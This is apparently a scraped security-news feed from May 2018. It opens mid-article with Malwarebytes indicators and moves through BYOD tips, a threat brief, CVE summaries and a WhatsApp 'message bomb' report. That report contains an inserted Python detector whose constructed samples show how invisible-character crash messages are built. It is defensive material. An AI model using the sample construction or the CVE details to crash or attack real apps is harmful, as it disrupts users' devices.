Malwarebytes users are protected against this threat thanks to domain blocks on oclasrv[.]com and deloton[.]com. We have also reported the advertising IDs we were able to collect to PropellerAds, and the malicious redirector domains/browlocks to CloudFlare.

Indicators of compromise

A list of the domains used for the browser lockers can be found here.

The post Tech support scam uses fake Shoppers Stop to draw from thousands of forced ad injections appeared first on Malwarebytes Labs.

You, Your Company, and BYOD: A Love Triangle

BYOD, or bring your own device, has become the new normal in the corporate workplace. But with this convenience comes impending security concerns. Although BYOD costs companies less, mobile devices are often used without proper security measures in place. This makes it difficult for employers to determine how much access employees should receive to company networks. The more access an employee has to company networks, the more opportunities for not only their personal information becoming vulnerable, but company data as well. With BYOD becoming more prevalent in the workplace, it is vital companies and employees understand the perks and security concerns that are associated with BYOD and take necessary steps to ensure personal devices and company information is protected.

BYOD can offer some really great perks: 1) employers spend less on technology and providing devices to employees thus saving the company money and 2) you get to use your own device(s) with which you are already accustomed to. Your company may already allow BYOD in your office, but do you know the associated security risks? They are complicated. Three looming concerns of BYOD that companies and employees should be addressing are accessibility to company data, lost or stolen devices, and overall maintenance. Let’s delve into why these concerns are the most pressing.

  1. Accessibility. The overarching question of BYOD is who gets access to company data on their personal devices, and when and where? For example, if you are at a meeting outside of the office and you are on a limited-access BYOD policy with your employer, you would only be able to access work email and contacts but nothing stored on the company servers. If your client asks to see a specific document hosted on your company server during the meeting, you won’t be able to access it because it is sensitive and lives on the private servers. This is where BYOD backfires for the employee.
  2. Lost or stolen devices. A personal device that contains confidential company information poses a huge security threat if it is lost or stolen, and begs the question: who is responsible for retrieving the device and/or data? What is the proper response to this sort of breach? It is your personal device, with both personal and company data, so should it be locked, tracked and retrieved, or completely wiped immediately? There is no clear or correct answer, which is why companies need a clear BYOD policy and culture of security that fits both parties’ needs.
  3. Maintenance and malware. Infrequent device maintenance, delayed software updates and uninformed app downloads can open the door to a slew of security vulnerabilities. Organizations have a hard enough time implementing their own software across the corporate network, let alone ensuring all employees are applying the required software updates for device operating systems and applications. With the breadth of different phones and tablets being used around the globe, it can be nearly impossible to keep track of employees’ security posture on their personal devices.

Without the right security measures in place, there is the possibility of malware being downloaded through sketchy apps or unpatched versions of software, which could be transferred onto corporate servers depending on the employee’s access level. McAfee Labs detected over 16 million mobile malware infestations in the third quarter of 2017 alone, nearly doubling the number one year previously. This uptick in cyberattacks on mobile devices illustrates the importance of comprehensive cybersecurity policies across the board.

So how do you protect yourself when it comes to using your smartphone or tablet for both business and pleasure? Here are a few tips:

  • Practice discretion when alternating between personal and business tasks on your mobile device. Separate the two by using different, verified apps for company and personal uses to maintain safety.
  • Avoid downloading apps from third-party vendors that could make your device prone to malware, and always check the permissions of any app before downloading, particularly those that ask for access to your device’s data.
  • Regularly update your device to ensure it is equipped with vital patches that protect against flaws and bugs that cybercriminals can exploit.
  • Avoid accessing data-sensitive apps on your device over public Wi-Fi. Cybercriminals could use this as an opportunity to take a look at your mobile data.
  • Keep your personal and work information secure with comprehensive mobile security, such as McAfee® Mobile Security, that will not only scan your device for viruses and threats but also help you identify apps that are accessing too much of your valuable personal information.

McAfee is the device-to-cloud cybersecurity company helping to secure data at all levels, on all devices. We’re helping you stop threats and protect your data wherever it resides, from your fingertips to the skies, enabling you to protect what matters on your digital journey.

Interested in learning more about IoT and mobile security tips and trends? Follow @McAfee_Home on Twitter, and “Like” us on Facebook.

The post You, Your Company, and BYOD: A Love Triangle appeared first on McAfee Blogs.

Weekly Threat Intelligence Brief: May 8, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“Senator John McCain wrote in his new book that America should seriously consider a cyberattack to retaliate for Russia’s meddling in U.S. elections, to send a strong message to the superpower. The book, titled “The Restless Wave” and scheduled for a May 22 release, also touches on accusations that Russia could have compromising material related to U.S. President Donald Trump and confirms that McCain has reviewed a copy of the Steele dossier, opposition research authored by an ex-British spy that includes salacious allegations about Trump and his alleged ties to Russia.”

 –Defense News


“Twitter revealed that a bug caused the platform to store user passwords in an unmasked form meaning that it is possible that Twitter stored plain text passwords openly without any hashing on an internal log. Twitter notes that it currently has “no reason to believe password information ever left Twitter’s system” or that these unprotected passwords were accessed by hackers, but the risk of the unknown remains. The company has advised users to change their passwords as a precautionary measure. At this time, Twitter declined to provide additional technical details on the incident but emphasized that it believes the likelihood that the passwords were discoverable is “extremely low” and an internal investigation has revealed no indications of a breach or other misuse.”

Risk Takers

Information Security Risk

“A bank in Australia lost the personal financial histories of 12 million customers, and chose not to reveal the breach to consumers, in one of the largest financial services privacy breaches ever to occur in Australia. The nation’s largest bank lost the banking statements for customers from 2004 to 2014 after a subcontractor lost several tape drives containing the financial information in 2016. While the bank initially notified the Office of the Australian Information Commissioner (OAIC) of the breach shortly after it became aware of it in 2016, a spokesperson for the OAIC said it was now making further inquiries into the privacy breach, following a damning report into the bank’s culture. The breach occurred in 2016 when the bank’s subcontractor Fuji Xerox was decommissioning a data storage center where some Bank customer data was stored.”


Operational Risk

“A new spam campaign designed to infect victims with GandCrab ransomware has surged, as the criminals behind the scheme look to infect as many victims as possible. Analysis by researchers at a security company found that three new samples of GandCrab 2.1 are being distributed as the payload in a single mass spam campaign. “This means that newly created samples are being pushed simultaneously, possibly with different configurations, or simply in an attempt to evade specific file signatures,” said researchers. Tens of thousands of GandCrab spam emails are being distributed each day, with mail servers hosted in the US representing the most common target by far, accounting for three quarters of deliveries. When it comes to successful infections, the US currently accounts for the fourth largest percentage of victims, behind Peru, Chile and India.”


The post Weekly Threat Intelligence Brief: May 8, 2018 appeared first on LookingGlass Cyber Solutions Inc.

New WhatsApp message can crash your app and phone

A malformed message is being forwarded via WhatsApp which, when tapped, could crash not just the Android app but possibly the entire Android device as well, the media reported.

"As with any message bomb, it involves sending and receiving a specially crafted message with hidden symbols in-between spaces. Tapping on a portion of the text will basically make the app 'expand' the hidden symbols, potentially overloading the app and even the OS," SlashGear reported on Sunday (May 6).

"There seem to be two variants of this WhatsApp message being forwarded. One involves an ominous black dot that comes with a warning on what will happen if you tap on it which most curious cats will do anyway," the report added.

The message reads: “If you touch the black point then your WhatsApp will hang”. That line is followed by a black dot on the next line and the words "t-touch here". Upon touching the black icon, the app freezes. As per reports, the message uses an RLM (right-to-left mark), as opposed to WhatsApp's left-to-right format, which causes the app to crash. The message is said to affect both Android and iOS.

Another "message bomb" that is causing the messaging platform to crash is more "nefarious, looks too innocent" and does not come with a warning. The message includes special characters, followed by an emoji, that do not display visibly but are used to change text behaviour. The message, containing the text "This is very interesting!", is followed by a crying-laughing emoji at the end. As per a Reddit user, the message is so heavy that it crashes the smartphone when copied and pasted into another chat box. The string of characters, which makes the message enormous, is what is believed to be crashing the app.
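A defensive heuristic for the two variants described above, as an added example (not WhatsApp code): it counts bidirectional marks such as the RLM and other invisible format characters in a message and flags a message when they dominate. The thresholds and the short constructed samples are the example's own assumptions, not real payloads.

```python
"""Invisible-character flood check for 'message bomb' texts.

Added example, not WhatsApp code.  The black-dot variant pads the text with
right-to-left marks (U+200F); the second variant uses other zero-width and
format characters.  Thresholds are constructed; the samples are short
stand-ins for messages that really carry thousands of such characters."""
import unicodedata

# Bidirectional controls: LRM/RLM marks plus the embedding, override and isolate controls.
BIDI_CONTROLS = frozenset("\u200e\u200f\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
# Zero-width characters; ZWJ (U+200D) also appears legitimately inside emoji sequences.
ZERO_WIDTH = frozenset("\u200b\u200c\u200d\u2060\ufeff")


def invisible_stats(text):
    """Count characters by class; 'other_format' catches remaining Cf code points."""
    stats = {"bidi": 0, "zero_width": 0, "other_format": 0, "visible": 0}
    for ch in text:
        if ch in BIDI_CONTROLS:
            stats["bidi"] += 1
        elif ch in ZERO_WIDTH:
            stats["zero_width"] += 1
        elif unicodedata.category(ch) == "Cf":
            stats["other_format"] += 1
        elif not ch.isspace():
            stats["visible"] += 1
    return stats


def is_message_bomb(text, max_invisible=20, max_ratio=0.5):
    """Flag a message whose invisible characters dominate, by absolute count or
    relative to visible ones.  Constructed thresholds: ordinary text, including
    right-to-left scripts and ZWJ emoji sequences, stays well below both."""
    s = invisible_stats(text)
    invisible = s["bidi"] + s["zero_width"] + s["other_format"]
    if invisible > max_invisible:
        return True
    total = invisible + s["visible"]
    return total > 0 and invisible / total > max_ratio


def strip_bidi_controls(text):
    """Neutralise the direction-mark trick while leaving ZWJ-based emoji intact."""
    return "".join(ch for ch in text if ch not in BIDI_CONTROLS)


# Constructed samples (the real messages carry far more padding).
BLACK_DOT_SAMPLE = ("If you touch the black point then your WhatsApp will hang \u25cf"
                    + "\u200f" * 60 + " t-touch here")
INTERESTING_SAMPLE = "This is very interesting! " + "\u200b\u200c" * 40 + "\U0001F602"
FAMILY_EMOJI = "Hi \U0001F468\u200d\U0001F469\u200d\U0001F467"   # legitimate ZWJ sequence

if __name__ == "__main__":
    for label, msg in [("black dot", BLACK_DOT_SAMPLE), ("interesting", INTERESTING_SAMPLE),
                       ("family emoji", FAMILY_EMOJI)]:
        print(label, invisible_stats(msg), "bomb" if is_message_bomb(msg) else "ok")
```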

The problem of WhatsApp being crashed by forwarded messages has existed for a long time, with such messages repeatedly taking new forms. Such messages or "message bombs" are not limited to Android. Even iMessage is not immune to bugs that could send the app crashing.

WhatsApp has not commented on the potentially disruptive bug so far.

FBI Has Received Over Four Million Internet Crime Complaints Since 2000

The FBI has received a total of more than four million Internet crime complaints from users since the year 2000. According to its Internet Crime Complaint Center (IC3) 2017 Internet Crime Report, the Bureau received its four millionth Internet crime complaint on 12 October 2017. Users submitted tens of thousands of additional reports in the […]

The post FBI Has Received Over Four Million Internet Crime Complaints Since 2000 appeared first on The State of Security.

How Microsoft Edge’s hidden WDAG browser lets you surf the web securely

Occasionally, for whatever reason, we browse parts of the web we know could be dangerous, where malicious pop-ups, ransomware or other malware could infect our PCs. While no solution is totally safe, Microsoft now has a free, specialized version of its Edge browser specifically designed to protect you online: Windows Device Application Guard, or WDAG.

WDAG was originally developed for Windows 10 Enterprise, protecting companies with billions of dollars at stake. Now that same protection has migrated to Windows 10 Pro—sorry, Windows 10 Home users—as an optional feature that you can turn on within Windows, for free. It debuted on Windows 10 Pro as part of the April 2018 Update


Getting grounded in IoT networking and security


Who wants to go threat hunting?

I’ve been a lot of things in my professional career including paramedic, accountant, computer trainer, PC/network technician, VP of IT, consultant and writer. The most enjoyable job I ever had was penetration tester. You get paid to break into places, work with cool people, and learn a lot. Best of all, if you couldn’t break into a place, the customer would be delighted and brag about how their computer security defenses didn’t fall to a sustained hacking test. 

Interruptions Are Bad – Business Security Weekly #84

This week, Michael and Paul interview Senior Attorney, Elizabeth Wharton! In the Article Discussion, the work required to have an opinion, why email is so stressful, productivity, and more! In Tracking Security Innovation, we have updates from Carbon Black, Trusted Key, Namogoo, IronNet Cybersecurity, and more on this episode of Business Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/BSWEpisode84


Visit https://www.securityweekly.com/bsw for all the latest episodes!

Understanding the Role of Multi-Stage Detection in a Layered Defense

The cybersecurity landscape has changed dramatically during the past decade, with threat actors constantly changing tactics to breach businesses’ perimeter defenses, cause data breaches, or spread malware. New threats, new tools, and new techniques are regularly chained together to pull off advanced and sophisticated attacks that span across multiple deployment stages, in an effort to be as stealthy, as pervasive, and as effective as possible without triggering any alarm bells from traditional security solutions.

Security solutions have also evolved, encompassing multi-stage and multi-layered defensive technologies aimed at covering all potential attack vectors and detecting threats at pre-execution, on-execution, or even throughout execution.

Multi-Stage Detection

All malware is basically code that is stored (on disk or in memory) and executed, just like any other application. Whether it is delivered as a file or a binary, security technologies refer to the states at which it can be detected as pre-execution and on-execution. Basically, it boils down to detecting malware before, or after, it gets executed on the victim’s endpoint.

Layered security solutions often cover these detection stages with multiple security technologies specifically designed to detect and prevent zero-day threats, APTs, fileless attacks and obfuscated malware from reaching or executing on the endpoint.

For example, pre-execution detection technologies often include signatures and file fingerprints matched against cloud lookups, local and cloud-based machine learning models aimed at ascertaining the likelihood that an unknown file is malicious based on its similarity to known malicious files, as well as hyper detection technologies, which are essentially machine learning algorithms on steroids.

It helps to think of hyper detection technologies as deliberately paranoid machine learning algorithms for detecting advanced and sophisticated threats at pre-execution, without taking any chances. This is particularly useful for organizations in detecting potentially advanced attacks, as it can inspect and detect malicious commands and scripts - including VBScript, JavaScript, PowerShell and WMI scripts - that are usually associated with sophisticated fileless attacks.

On-execution security technologies sometimes involve detonating the binary inside a sandboxed environment, letting it execute for a set amount of time, then analyzing every system change the binary made, every internet connection it attempted, and in general any change or behavior the binary caused on the system after it was executed. A sandbox analyzer is highly effective because there is no risk of infecting a production endpoint, and the security tools used to analyze the binary can be set to a highly paranoid mode. The trade-off is that the same analysis would typically cause performance penalties on a production endpoint, and would even risk compromising the organization’s network should the threat actually breach containment.

Of course, there are on-execution technologies that are deployed on endpoints to specifically detect and prevent exploits from occurring or for monitoring the behavior of running applications and processes throughout their entire lifetime. These technologies are designed to constantly assess the security status of all running applications, and prevent any malicious behavior from compromising the endpoint.

Layered Security Defenses

Multi-stage detection using layered security technologies gives security teams the unique ability to stop the attack kill chain at almost any stage of attack, regardless of the threat’s complexity. For instance, while a tampered document that contains a malicious Visual Basic script might bypass an email filtering solution, it will definitely be picked up by a sandbox analyzer technology as soon as the script starts to execute malicious instructions or commands, or starts to connect to and download additional components on the endpoint.

It’s important to understand that the increased sophistication of threats requires security technologies capable of covering multiple stages of attack, creating a security mesh that acts as a safety net to protect your infrastructure and data. However, it’s equally important that all these security layers be managed from a centralized console that offers a single pane of glass visibility into the overall security posture of the organization. This makes managing security aspects less cumbersome, while also helping security and IT teams focus on implementing prevention measures rather than fighting alert fatigue.

About the author: Liviu Arsene is a Senior E-Threat analyst for Bitdefender, with a strong background in security and technology. Reporting on global trends and developments in computer security, he writes about malware outbreaks and security incidents while coordinating with technical and research departments.

Copyright 2010 Respective Author at Infosec Island

Two Romanian Hackers Extradited to the U.S. Over $18 Million Vishing Scam

Two Romanian hackers have been extradited to the United States to face 31 criminal charges, including computer fraud and abuse, wire fraud conspiracy, wire fraud, and aggravated identity theft. Described as "international computer hackers" by the United States Department of Justice, Teodor Laurentiu Costea, 41, and Robert Codrut Dumitrescu, 40, allegedly robbed Americans of more than $18 million

Twitter is Testing End-to-End Encrypted Direct Messages

Twitter has been adopting new trends at a snail's pace, but better late than never. Since 2013, people have been speculating that Twitter would bring end-to-end encryption to its direct messages, and now, almost 5 years after the encryption era began, the company is testing end-to-end encrypted messaging on Twitter. Dubbed "Secret Conversation," the feature has been spotted in

CVE-2018-10809 (2345_security_guard)

In 2345 Security Guard 3.7, the driver file (2345NetFirewall.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because it does not validate input values from IOCtl 0x00222040. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-8873.

CVE-2018-10806 (frogcms)

An issue was discovered in Frog CMS 0.9.5. There is a reflected cross-site scripting vulnerability via the file[current_name] parameter to the admin/?/plugin/file_manager/rename URI. This can be used in conjunction with CSRF.

Tripwire Survey: Most RSAC Attendees Favor Shorter Vulnerability Disclosure Timelines

With continued debate around responsible disclosure and increased attention on security research techniques, Tripwire wanted to get a pulse on what the community considers responsible practices today. In surveying 147 attendees at the RSA Conference in San Francisco a couple of weeks ago, we found a number of interesting perspectives. Most respondents favored shorter timelines […]

The post Tripwire Survey: Most RSAC Attendees Favor Shorter Vulnerability Disclosure Timelines appeared first on The State of Security.

Happy National Teacher Appreciation Day!

Today is National Teacher Appreciation Day. How are you celebrating?

At Verisign, we did a quick search on NameStudio™, our easy-to-use domain name suggestion tool, to see what interesting .com and .net domain names were available to register today … and here are some of our favorites!

What’s yours?

Tell us what great .com and .net domain names you’ve found on NameStudio and check back soon to see what day we’re celebrating next. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.

*Available as of May 8, 2018

The user is solely responsible for ensuring that the registration of any domain name listed herein or based on NameStudio domain search data does not violate any third-party trademarks or other intellectual property.

The post Happy National Teacher Appreciation Day! appeared first on Verisign Blog.